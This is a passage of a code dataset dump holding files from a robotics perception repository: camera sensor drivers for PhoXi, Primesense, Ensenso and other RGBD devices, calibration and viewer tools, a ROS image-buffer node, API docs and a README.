depths.append(depth)\n\n median_depth = Image.median_images(depths)\n median_depth.data[median_depth.data == 0.0] = fill_depth\n return median_depth\n\n def min_depth_img(self, num_img=1):\n \"\"\"Collect a series of depth images and return the min of the set.\n\n Parameters\n ----------\n num_img : int\n The number of consecutive frames to process.\n\n Returns\n -------\n :obj:`DepthImage`\n The min DepthImage collected from the frames.\n \"\"\"\n depths = []\n\n for _ in range(num_img):\n _, depth, _ = self.frames()\n depths.append(depth)\n\n return Image.min_images(depths)\n"
},
{
"alpha_fraction": 0.6230323314666748,
"alphanum_fraction": 0.6429163217544556,
"avg_line_length": 23.632652282714844,
"blob_id": "4aa2c41713c1d73acd012648a8fc88d83e6f80b5",
"content_id": "c9ca78ddc6c095971fa57e42990327fe9d24c699",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1207,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 49,
"path": "/tools/primesense_viewer.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSimple tool to view output and fps of a primesense RGBD sensor\nAuthor: Jeff Mahler\n\"\"\"\nimport logging\nimport time\n\nimport numpy as np\nfrom visualization import Visualizer2D as vis\nfrom visualization import Visualizer3D as vis3d\n\nfrom perception import PrimesenseSensor\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n\n sensor = PrimesenseSensor()\n\n logging.info(\"Starting sensor\")\n sensor.start()\n camera_intr = sensor.ir_intrinsics\n\n n = 15\n frame_rates = []\n for i in range(n):\n logging.info(\"Reading frame %d of %d\" % (i + 1, n))\n read_start = time.time()\n color_im, depth_im, _ = sensor.frames()\n read_stop = time.time()\n frame_rates.append(1.0 / (read_stop - read_start))\n\n logging.info(\"Avg fps: %.3f\" % (np.mean(frame_rates)))\n\n color_im = color_im.inpaint(rescale_factor=0.5)\n depth_im = depth_im.inpaint(rescale_factor=0.5)\n point_cloud = camera_intr.deproject(depth_im)\n\n vis3d.figure()\n vis3d.points(point_cloud, subsample=15)\n vis3d.show()\n\n vis.figure()\n vis.subplot(1, 2, 1)\n vis.imshow(color_im)\n vis.subplot(1, 2, 2)\n vis.imshow(depth_im)\n vis.show()\n\n sensor.stop()\n"
},
{
"alpha_fraction": 0.6520681381225586,
"alphanum_fraction": 0.6520681381225586,
"avg_line_length": 15.86301326751709,
"blob_id": "29094fe753724381a460270c50d51cfd3a611b1c",
"content_id": "c7c59dc9cb27379393c3f70d953e452f84ad0a20",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1233,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 73,
"path": "/docs/source/api/features.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Features\n========\nClasses for encapsulatng and modifying feature vectors.\n\nFeatureExtractor\n~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.FeatureExtractor\n\nCNNBatchFeatureExtractor\n~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.CNNBatchFeatureExtractor\n\nCNNReusableBatchFeatureExtractor\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.CNNReusableBatchFeatureExtractor\n\nFeature\n~~~~~~~\n\n.. autoclass:: perception.Feature\n\nBagOfFeatures\n~~~~~~~~~~~~~\n\n.. autoclass:: perception.BagOfFeatures\n\nLocalFeature\n~~~~~~~~~~~~\n\n.. autoclass:: perception.LocalFeature\n\nGlobalFeature\n~~~~~~~~~~~~~\n\n.. autoclass:: perception.GlobalFeature\n\nSHOTFeature\n~~~~~~~~~~~\n\n.. autoclass:: perception.SHOTFeature\n\nMVCNNFeature\n~~~~~~~~~~~~\n\n.. autoclass:: perception.MVCNNFeature\n\nCorrespondences\n~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.Correspondences\n\nNormalCorrespondences\n~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.NormalCorrespondences\n\nFeatureMatcher\n~~~~~~~~~~~~~~\n\n.. autoclass:: perception.FeatureMatcher\n\nRawDistanceFeatureMatcher\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.RawDistanceFeatureMatcher\n\nPointToPlaneFeatureMatcher\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. autoclass:: perception.PointToPlaneFeatureMatcher\n\n\n"
},
{
"alpha_fraction": 0.5395489931106567,
"alphanum_fraction": 0.5554386973381042,
"avg_line_length": 30.46691131591797,
"blob_id": "4608d62e8fd9a8f06d8d3fd76c7a99ef209c8551",
"content_id": "91c28e9e14b110f06dfd5f5c24e5e8c1ad499137",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8559,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 272,
"path": "/perception/phoxi_ros_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "import logging\nimport time\n\nimport numpy as np\nimport rospy\nfrom autolab_core import CameraIntrinsics, DepthImage, GrayscaleImage, Image\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom sensor_msgs.msg import Image as ImageMessage\nfrom std_srvs.srv import Empty\n\nfrom perception.srv import ConnectCamera, GetDeviceList, GetFrame, TriggerImage\n\nfrom .camera_sensor import CameraSensor\nfrom .exceptions import SensorUnresponsiveException\n\n\nclass PhoXiSensor(CameraSensor):\n \"\"\"Class for interfacing with a PhoXi Structured Light Sensor.\"\"\"\n\n def __init__(\n self, frame=\"phoxi\", device_name=\"2018-02-020-LC3\", size=\"small\"\n ):\n \"\"\"Initialize a PhoXi Sensor.\n\n Parameters\n ----------\n frame : str\n A name for the frame in which depth images, normal maps,\n and RGB images are returned.\n device_name : str\n The string name of the PhoXi device\n (SN listed on sticker on back sensor).\n Old PhoXi: 1703005\n New PhoXi: 2018-02-020-LC3\n size : str\n An indicator for which size of image is desired.\n Either 'large' (2064x1544) or 'small' (1032x772).\n \"\"\"\n\n self._frame = frame\n self._device_name = str(device_name)\n self._camera_intr = None\n self._running = False\n self._bridge = CvBridge()\n\n self._cur_color_im = None\n self._cur_depth_im = None\n self._cur_normal_map = None\n\n # Set up camera intrinsics for the sensor\n width, height = 2064, 1544\n focal_x, focal_y = 2244.0, 2244.0\n center_x, center_y = 1023.0, 768.0\n if size == \"small\":\n width = 1032\n height = 772\n focal_x = focal_x / 2\n focal_y = focal_y / 2\n center_x = center_x / 2\n center_y = center_y / 2\n\n if str(device_name) == \"1703005\":\n focal_x = focal_y = 1105.0\n\n self._camera_intr = CameraIntrinsics(\n self._frame,\n focal_x,\n focal_y,\n center_x,\n center_y,\n height=height,\n width=width,\n )\n\n def __del__(self):\n \"\"\"Automatically stop the sensor for safety.\"\"\"\n if self.is_running:\n self.stop()\n\n @property\n def color_intrinsics(self):\n \"\"\"CameraIntrinsics : Camera intrinsics for PhoXi Greyscale camera.\"\"\"\n return self._camera_intr\n\n @property\n def ir_intrinsics(self):\n \"\"\"CameraIntrinsics : Camera intrinsics for PhoXi IR camera.\"\"\"\n return self._camera_intr\n\n @property\n def is_running(self):\n \"\"\"bool : True if the stream is running, or false otherwise.\"\"\"\n return self._running\n\n @property\n def frame(self):\n \"\"\"str : The reference frame of the sensor.\"\"\"\n return self._frame\n\n @property\n def color_frame(self):\n \"\"\"str : The reference frame of the sensor.\"\"\"\n return self._frame\n\n @property\n def ir_frame(self):\n \"\"\"str : The reference frame of the sensor.\"\"\"\n return self._frame\n\n def start(self):\n \"\"\"Start the sensor.\"\"\"\n if rospy.get_name() == \"/unnamed\":\n raise ValueError(\"PhoXi sensor must be run inside a ros node!\")\n\n # Connect to the cameras\n if not self._connect_to_sensor():\n self._running = False\n return False\n\n # Set up subscribers for camera data\n self._color_im_sub = rospy.Subscriber(\n \"/phoxi_camera/texture\", ImageMessage, self._color_im_callback\n )\n self._depth_im_sub = rospy.Subscriber(\n \"/phoxi_camera/depth_map\", ImageMessage, self._depth_im_callback\n )\n self._normal_map_sub = rospy.Subscriber(\n \"/phoxi_camera/normal_map\", ImageMessage, self._normal_map_callback\n )\n\n self._running = True\n\n return True\n\n def stop(self):\n \"\"\"Stop the sensor.\"\"\"\n # Check that everything is running\n if not self._running:\n logging.warning(\"PhoXi not running. Aborting stop\")\n return False\n\n # Stop the subscribers\n self._color_im_sub.unregister()\n self._depth_im_sub.unregister()\n self._normal_map_sub.unregister()\n\n # Disconnect from the camera\n rospy.ServiceProxy(\"phoxi_camera/disconnect_camera\", Empty)()\n\n self._running = False\n\n return True\n\n def frames(self):\n \"\"\"Retrieve a new frame from the PhoXi and convert it to a\n ColorImage and a DepthImage.\n\n Returns\n -------\n :obj:`tuple` of :obj:`ColorImage`, :obj:`DepthImage`\n The ColorImage and DepthImage of the current frame.\n \"\"\"\n # Run a software trigger\n rospy.ServiceProxy(\"phoxi_camera/start_acquisition\", Empty)()\n rospy.ServiceProxy(\"phoxi_camera/trigger_image\", TriggerImage)()\n\n self._cur_color_im = None\n self._cur_depth_im = None\n self._cur_normal_map = None\n\n rospy.ServiceProxy(\"phoxi_camera/get_frame\", GetFrame)(-1)\n\n max_time = 5.0\n time_waiting = 0.0\n while (\n self._cur_color_im is None\n or self._cur_depth_im is None\n or self._cur_normal_map is None\n ):\n time.sleep(0.05)\n time_waiting += 0.05\n if time_waiting > max_time:\n raise SensorUnresponsiveException(\n \"PhoXi sensor seems to be non-responsive\"\n )\n return self._cur_color_im, self._cur_depth_im\n\n def median_depth_img(self, num_img=1, fill_depth=0.0):\n \"\"\"Collect a series of depth images and return the median of the set.\n\n Parameters\n ----------\n num_img : int\n The number of consecutive frames to process.\n\n Returns\n -------\n DepthImage\n The median DepthImage collected from the frames.\n \"\"\"\n depths = []\n\n for _ in range(num_img):\n _, depth, _ = self.frames()\n depths.append(depth)\n\n median_depth = Image.median_images(depths)\n median_depth.data[median_depth.data == 0.0] = fill_depth\n return median_depth\n\n def _connect_to_sensor(self):\n \"\"\"Connect to the sensor.\"\"\"\n name = self._device_name\n try:\n # Check if device is actively in list\n rospy.wait_for_service(\"phoxi_camera/get_device_list\")\n device_list = rospy.ServiceProxy(\n \"phoxi_camera/get_device_list\", GetDeviceList\n )().out\n if not str(name) in device_list:\n logging.error(\n \"PhoXi sensor {} not in list of active devices\".format(\n name\n )\n )\n return False\n\n success = rospy.ServiceProxy(\n \"phoxi_camera/connect_camera\", ConnectCamera\n )(name).success\n if not success:\n logging.error(\n \"Could not connect to PhoXi sensor {}\".format(name)\n )\n return False\n\n logging.debug(\"Connected to PhoXi Sensor {}\".format(name))\n return True\n\n except rospy.ServiceException as e:\n logging.error(\"Service call failed: {}\".format(e))\n return False\n\n def _color_im_callback(self, msg):\n \"\"\"Callback for handling textures (greyscale images).\"\"\"\n try:\n data = self._bridge.imgmsg_to_cv2(msg)\n if np.max(data) > 255.0:\n data = (\n 255.0 * data / 1200.0\n ) # Experimentally set value for white\n data = np.clip(data, 0.0, 255.0).astype(np.uint8)\n gsimage = GrayscaleImage(data, frame=self._frame)\n self._cur_color_im = gsimage.to_color()\n except (CvBridgeError, ValueError):\n self._cur_color_im = None\n\n def _depth_im_callback(self, msg):\n \"\"\"Callback for handling depth images.\"\"\"\n try:\n self._cur_depth_im = DepthImage(\n self._bridge.imgmsg_to_cv2(msg) / 1000.0, frame=self._frame\n )\n except (CvBridgeError, ValueError):\n self._cur_depth_im = None\n\n def _normal_map_callback(self, msg):\n \"\"\"Callback for handling normal maps.\"\"\"\n try:\n self._cur_normal_map = self._bridge.imgmsg_to_cv2(msg)\n except (CvBridgeError, ValueError):\n self._cur_normal_map = None\n"
},
{
"alpha_fraction": 0.5868756771087646,
"alphanum_fraction": 0.5887354016304016,
"avg_line_length": 31.73043441772461,
"blob_id": "a53648baf9a82682222f355452d40d698868894b",
"content_id": "271e06e623e9f1dcae35b374b38745ea3f38faa1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3764,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 115,
"path": "/perception/rgbd_sensors.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nRGBD Sensor factory\nAuthor: Jeff Mahler\n\"\"\"\n\nfrom . import exceptions\nfrom .virtual_camera_sensor import TensorDatasetVirtualSensor, VirtualSensor\nfrom .webcam_sensor import WebcamSensor\n\ntry:\n from .kinect2_sensor import Kinect2Sensor\nexcept BaseException as E:\n Kinect2Sensor = exceptions.closure(E)\n\ntry:\n from .kinect2_ros_sensor import KinectSensorBridged\nexcept BaseException as E:\n KinectSensorBridged = exceptions.closure(E)\n\ntry:\n from .primesense_sensor import PrimesenseSensor\nexcept BaseException as E:\n PrimesenseSensor = exceptions.closure(E)\n\ntry:\n from .primesense_ros_sensor import PrimesenseSensor_ROS\nexcept BaseException as E:\n PrimesenseSensor_ROS = exceptions.closure(E)\n\ntry:\n from .realsense_sensor import RealSenseSensor\nexcept BaseException as E:\n RealSenseSensor = exceptions.closure(E)\n\ntry:\n from .ensenso_sensor import EnsensoSensor\nexcept BaseException as E:\n EnsensoSensor = exceptions.closure(E)\n\ntry:\n from .colorized_phoxi_sensor import ColorizedPhoXiSensor\n from .phoxi_ros_sensor import PhoXiSensor\nexcept BaseException as E:\n PhoXiSensor = exceptions.closure(E)\n ColorizedPhoXiSensor = exceptions.closure(E)\n\n\nclass RgbdSensorFactory:\n \"\"\"Factory class for Rgbd camera sensors.\"\"\"\n\n @staticmethod\n def sensor(sensor_type, cfg):\n \"\"\"Creates a camera sensor of the specified type.\n\n Parameters\n ----------\n sensor_type : :obj:`str`\n the type of the sensor (real or virtual)\n cfg : :obj:`YamlConfig`\n dictionary of parameters for sensor initialization\n \"\"\"\n sensor_type = sensor_type.lower()\n if sensor_type == \"kinect2\":\n s = Kinect2Sensor(\n packet_pipeline_mode=cfg[\"pipeline_mode\"],\n device_num=cfg[\"device_num\"],\n frame=cfg[\"frame\"],\n )\n elif sensor_type == \"bridged_kinect2\":\n s = KinectSensorBridged(quality=cfg[\"quality\"], frame=cfg[\"frame\"])\n elif sensor_type == \"primesense\":\n flip_images = True\n if \"flip_images\" in cfg.keys():\n flip_images = cfg[\"flip_images\"]\n s = PrimesenseSensor(\n auto_white_balance=cfg[\"auto_white_balance\"],\n flip_images=flip_images,\n frame=cfg[\"frame\"],\n )\n elif sensor_type == \"virtual\":\n s = VirtualSensor(cfg[\"image_dir\"], frame=cfg[\"frame\"])\n elif sensor_type == \"tensor_dataset\":\n s = TensorDatasetVirtualSensor(\n cfg[\"dataset_dir\"], frame=cfg[\"frame\"]\n )\n elif sensor_type == \"primesense_ros\":\n s = PrimesenseSensor_ROS(frame=cfg[\"frame\"])\n elif sensor_type == \"ensenso\":\n s = EnsensoSensor(frame=cfg[\"frame\"])\n elif sensor_type == \"phoxi\":\n s = PhoXiSensor(\n frame=cfg[\"frame\"],\n device_name=cfg[\"device_name\"],\n size=cfg[\"size\"],\n )\n elif sensor_type == \"webcam\":\n s = WebcamSensor(frame=cfg[\"frame\"], device_id=cfg[\"device_id\"])\n elif sensor_type == \"colorized_phoxi\":\n s = ColorizedPhoXiSensor(\n frame=cfg[\"frame\"],\n phoxi_config=cfg[\"phoxi_config\"],\n webcam_config=cfg[\"webcam_config\"],\n calib_dir=cfg[\"calib_dir\"],\n )\n elif sensor_type == \"realsense\":\n s = RealSenseSensor(\n cam_id=cfg[\"cam_id\"],\n filter_depth=cfg[\"filter_depth\"],\n frame=cfg[\"frame\"],\n )\n else:\n raise ValueError(\n \"RGBD sensor type %s not supported\" % (sensor_type)\n )\n return s\n"
},
{
"alpha_fraction": 0.5877483487129211,
"alphanum_fraction": 0.5877483487129211,
"avg_line_length": 18.483871459960938,
"blob_id": "761d92419ea328d3a11f6b19be7de223243c813a",
"content_id": "0d2ddc42c6c951b209f720a01057e6a84c796db6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 604,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 31,
"path": "/perception/camera_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAbstract class for Camera sensors.\nAuthor: Jeff Mahler\n\"\"\"\nfrom abc import ABCMeta, abstractmethod\n\n\nclass CameraSensor(object):\n \"\"\"Abstract base class for camera sensors.\"\"\"\n\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def start(self):\n \"\"\"Starts the sensor stream.\"\"\"\n pass\n\n @abstractmethod\n def stop(self):\n \"\"\"Stops the sensor stream.\"\"\"\n pass\n\n def reset(self):\n \"\"\"Restarts the sensor stream.\"\"\"\n self.stop()\n self.start()\n\n @abstractmethod\n def frames(self):\n \"\"\"Returns the latest set of frames.\"\"\"\n pass\n"
},
{
"alpha_fraction": 0.6031352877616882,
"alphanum_fraction": 0.6237623691558838,
"avg_line_length": 21.44444465637207,
"blob_id": "fa81b1409d4b27c3116831e5c6739da2af27a45a",
"content_id": "d7def39b073bcbde5c2e87fa5da68fa823c2380f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1212,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 54,
"path": "/tools/test_ensenso.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTests the ensenso.\nAuthor: Jeff Mahler\n\"\"\"\nimport logging\nimport sys\nimport time\n\nimport rospy\nfrom visualization import Visualizer2D as vis2d\nfrom visualization import Visualizer3D as vis3d\n\nfrom perception import RgbdSensorFactory\n\n\ndef main(args):\n # set logging\n logging.getLogger().setLevel(logging.INFO)\n rospy.init_node(\"ensenso_reader\", anonymous=True)\n\n num_frames = 10\n sensor = RgbdSensorFactory(\"ensenso\", cfg={\"frame\": \"ensenso\"})\n sensor.start()\n\n total_time = 0\n for i in range(num_frames):\n if i > 0:\n start_time = time.time()\n\n _, depth_im, _ = sensor.frames()\n\n if i > 0:\n total_time += time.time() - start_time\n print(\"Frame %d\" % (i))\n print(\"Avg FPS: %.5f\" % (float(i) / total_time))\n\n depth_im = sensor.median_depth_img(num_img=5)\n point_cloud = sensor.ir_intrinsics.deproject(depth_im)\n point_cloud.remove_zero_points()\n\n sensor.stop()\n\n vis2d.figure()\n vis2d.imshow(depth_im)\n vis2d.title(\"Ensenso - Raw\")\n vis2d.show()\n\n vis3d.figure()\n vis3d.points(point_cloud, random=True, subsample=10, scale=0.0025)\n vis3d.show()\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n"
},
{
"alpha_fraction": 0.7842586040496826,
"alphanum_fraction": 0.7969079613685608,
"avg_line_length": 128.4545440673828,
"blob_id": "5c986db624c81d88855c4a7cf144437e4288d548",
"content_id": "4d2f4f398fe98b05c757767bb81f8a141c901f06",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1423,
"license_type": "permissive",
"max_line_length": 501,
"num_lines": 11,
"path": "/README.md",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "## Berkeley Autolab Perception Module\n[](https://pypi.org/project/autolab-perception/) [](https://pypi.org/project/autolab-perception/) [](https://github.com/BerkeleyAutomation/perception/actions) [](https://github.com/psf/black)\n\nThis package provides a wide variety of useful tools for perception tasks.\nIt directly depends on the [Berkeley Autolab Core\nmodule](https://www.github.com/BerkeleyAutomation/autolab_core), so be sure to install\nthat first.\nView the install guide and API documentation for the perception module\n[here](https://BerkeleyAutomation.github.io/perception). Dependencies for each driver are not automatically installed, so please install ROS or camera-specific packages separately before using these wrappers.\n\nNOTE: As of May 4, 2021, this package no longer supports Python versions 3.5 or lower as these versions have reached EOL. In addition, many modules have been moved to `autolab_core` to reduce confusion. This repository now will contain sensor drivers and interfaces only. If you wish to use older Python versions or rely on the old modules, please use the 0.x.x series of tags."
},
{
"alpha_fraction": 0.43478259444236755,
"alphanum_fraction": 0.695652186870575,
"avg_line_length": 22,
"blob_id": "def8e9435ab86feb245c5ddfc8804d292284e7c7",
"content_id": "f0f78f4f001d39d7a697f79692374aa8507acab9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 1,
"path": "/perception/constants.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "LBS_TO_GRAMS = 453.592\n"
},
{
"alpha_fraction": 0.554395318031311,
"alphanum_fraction": 0.5624089241027832,
"avg_line_length": 35.44247817993164,
"blob_id": "3822ac1f4eec6d11de5e9ff62b753ac94fc216ba",
"content_id": "603270b2fa2dc062b2082a39c881ae99f5caed8e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4118,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 113,
"path": "/tools/register_webcam.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nScript to register webcam to a chessboard in the YuMi setup.\nAuthors: Matt Matl and Jeff Mahler\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport traceback\n\nimport cv2\nimport numpy as np\nfrom autolab_core import RigidTransform, YamlConfig\n\nfrom perception import RgbdSensorFactory\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n\n # parse args\n parser = argparse.ArgumentParser(\n description=\"Register a webcam to the robot\"\n )\n parser.add_argument(\n \"--config_filename\",\n type=str,\n default=\"cfg/tools/register_webcam.yaml\",\n help=\"filename of a YAML configuration for registration\",\n )\n args = parser.parse_args()\n config_filename = args.config_filename\n config = YamlConfig(config_filename)\n\n T_cb_world = RigidTransform.load(config[\"chessboard_tf\"])\n\n # Get camera sensor object\n for sensor_frame, sensor_data in config[\"sensors\"].iteritems():\n logging.info(\"Registering {}\".format(sensor_frame))\n sensor_config = sensor_data[\"sensor_config\"]\n reg_cfg = sensor_data[\"registration_config\"].copy()\n reg_cfg.update(config[\"chessboard_registration\"])\n\n try:\n # Open sensor\n sensor_type = sensor_config[\"type\"]\n sensor_config[\"frame\"] = sensor_frame\n logging.info(\"Creating sensor\")\n sensor = RgbdSensorFactory.sensor(sensor_type, sensor_config)\n logging.info(\"Starting sensor\")\n sensor.start()\n intrinsics = sensor.color_intrinsics\n logging.info(\"Sensor initialized\")\n\n # Register sensor\n resize_factor = reg_cfg[\"color_image_rescale_factor\"]\n nx, ny = reg_cfg[\"corners_x\"], reg_cfg[\"corners_y\"]\n sx, sy = reg_cfg[\"size_x\"], reg_cfg[\"size_y\"]\n\n img, _, _ = sensor.frames()\n resized_color_im = img.resize(resize_factor)\n corner_px = resized_color_im.find_chessboard(sx=nx, sy=ny)\n if corner_px is None:\n logging.error(\n \"No chessboard detected in sensor {}! \"\n \"Check camera exposure settings\".format(sensor_frame)\n )\n exit(1)\n webcam_corner_px = corner_px / resize_factor\n\n # Compute Camera Matrix for webcam\n objp = np.zeros((nx * ny, 3), np.float32)\n xstart = -sx * (nx / 2 - ((nx + 1) % 2) / 2.0)\n xend = sx * (nx / 2 - ((nx + 1) % 2) / 2.0 + 1)\n ystart = -sy * (ny / 2 - ((ny + 1) % 2) / 2.0)\n yend = sy * (ny / 2 - ((ny + 1) % 2) / 2.0 + 1)\n filler = np.mgrid[ystart:yend:sy, xstart:xend:sx]\n filler = filler.reshape(\n (filler.shape[0], filler.shape[1] * filler.shape[2])\n ).T\n objp[:, :2] = filler\n\n ret, rvec, tvec = cv2.solvePnP(\n objp, webcam_corner_px, intrinsics.K, None\n )\n mat, _ = cv2.Rodrigues(rvec)\n T_cb_cam = RigidTransform(\n mat, tvec, from_frame=\"cb\", to_frame=sensor_frame\n )\n T_cam_cb = T_cb_cam.inverse()\n T_camera_world = T_cb_world.dot(T_cam_cb)\n\n logging.info(\"Final Result for sensor %s\" % (sensor_frame))\n logging.info(\"Translation: \")\n logging.info(T_camera_world.translation)\n logging.info(\"Rotation: \")\n logging.info(T_camera_world.rotation)\n\n except Exception:\n logging.error(\"Failed to register sensor {}\".format(sensor_frame))\n traceback.print_exc()\n continue\n\n # save tranformation arrays based on setup\n output_dir = os.path.join(config[\"calib_dir\"], sensor_frame)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n pose_filename = os.path.join(\n output_dir, \"%s_to_world.tf\" % (sensor_frame)\n )\n T_camera_world.save(pose_filename)\n intr_filename = os.path.join(output_dir, \"%s.intr\" % (sensor_frame))\n intrinsics.save(intr_filename)\n\n sensor.stop()\n"
},
{
"alpha_fraction": 0.6073492169380188,
"alphanum_fraction": 0.6147446036338806,
"avg_line_length": 32.8046875,
"blob_id": "c7c9eb99e416bdea875d9ea411b5b09e1466f18a",
"content_id": "498746502cd4d2ffac665091aa529383eeac1696",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4327,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 128,
"path": "/ros_nodes/image_buffer.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\"\"\"\nROS node that buffers a ROS image stream and allows for\ngrabbing many images simultaneously.\n\"\"\"\nimport numpy as np\nimport rospy\nfrom cv_bridge import CvBridge\nfrom sensor_msgs.msg import Image\n\ntry:\n from perception.srv import ImageBuffer, ImageBufferResponse\nexcept ImportError:\n raise RuntimeError(\"image_buffer unavailable outside of catkin package\")\n\n# TODO:\n# Timestamps\n# Giving a warning if stale data is being returned/delete stale data\n# Launchfile for launching image buffer and primesense camera\n\n# Modify ImageBuffer to work with numpy arrays\nImageBufferResponse = rospy.numpy_msg.numpy_msg(ImageBufferResponse)\nImageBuffer._response_class = ImageBufferResponse\n\nif __name__ == \"__main__\":\n # Initialize the node.\n rospy.init_node(\"stream_image_buffer\")\n\n # Args:\n # instream (string) ROS image stream to buffer\n # absolute (bool, optional) if True, current frame is not prepended\n # to instream (default False)\n # bufsize (int, optional) Maximum size of image buffer\n # (number of images stored) (default 100)\n # show_framerate (bool, optional) If True, logs number of frames received\n # in the last 10 seconds (default True)\n instream = rospy.get_param(\"~instream\")\n absolute = rospy.get_param(\"~absolute\", False)\n bufsize = rospy.get_param(\"~bufsize\", 100)\n show_framerate = rospy.get_param(\"~show_framerate\", True)\n\n stream_to_buffer = instream\n if not absolute:\n stream_to_buffer = rospy.get_namespace() + stream_to_buffer\n\n # Initialize the CvBridge and image buffer list,\n # as well as misc counting things\n bridge = CvBridge()\n buffer = []\n dtype = \"float32\"\n images_so_far = 0\n\n def callback(data):\n \"\"\"Callback function for subscribing to an\n Image topic and creating a buffer\"\"\"\n global dtype\n global images_so_far\n\n # Get cv image (which is a numpy array) from data\n cv_image = bridge.imgmsg_to_cv2(data)\n # Save dtype before we float32-ify it\n dtype = str(cv_image.dtype)\n # Insert and roll buffer\n buffer.insert(\n 0, (np.asarray(cv_image, dtype=\"float32\"), rospy.get_time())\n )\n if len(buffer) > bufsize:\n buffer.pop()\n\n # for showing framerate\n images_so_far += 1\n\n # Initialize subscriber with our callback\n rospy.Subscriber(stream_to_buffer, Image, callback)\n\n def handle_request(req):\n \"\"\"Request-handling for returning a bunch of images stuck together\"\"\"\n # Register time of request\n req_time = rospy.get_time()\n\n # Check if request fits in buffer\n if req.num_requested > len(buffer):\n raise RuntimeError(\n \"Number of images requested exceeds current buffer size\"\n )\n\n # Cut out the images and timestamps we're returning, save image shape\n ret_images, ret_times = zip(*buffer[: req.num_requested])\n image_shape = ret_images[0].shape\n images_per_frame = 1 if len(image_shape) == 2 else image_shape[2]\n\n # Get timestamps in desired mode\n if req.timing_mode == 0:\n ret_times = np.asarray(ret_times)\n elif req.timing_mode == 1:\n ret_times = np.asarray([req_time - time for time in ret_times])\n else:\n raise RuntimeError(\n \"{0} is not a value for timing_mode\".format(req.timing_mode)\n )\n\n # Stack and unravel images because ROS doesn't like\n # multidimensional arrays\n ret_images = np.dstack(ret_images)\n\n return ImageBufferResponse(\n ret_times,\n ret_images.ravel(),\n images_per_frame,\n dtype,\n *ret_images.shape\n )\n\n # Initialize service with our request handler\n s = rospy.Service(\"stream_image_buffer\", ImageBuffer, handle_request)\n\n if show_framerate:\n r = rospy.Rate(0.1)\n while not rospy.is_shutdown():\n rospy.loginfo(\n \"{0} frames recorded in the past 10 seconds from {1}\".format(\n images_so_far, stream_to_buffer\n )\n )\n images_so_far = 0\n r.sleep()\n else:\n rospy.spin()\n"
},
{
"alpha_fraction": 0.6011834144592285,
"alphanum_fraction": 0.6173570156097412,
"avg_line_length": 26.85714340209961,
"blob_id": "88069a1c817e3ecc34685f683495d4f3f6fcc04e",
"content_id": "a865b886abc84ce0700301304e8f52889004f119",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2535,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 91,
"path": "/tools/colorize_phoxi.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
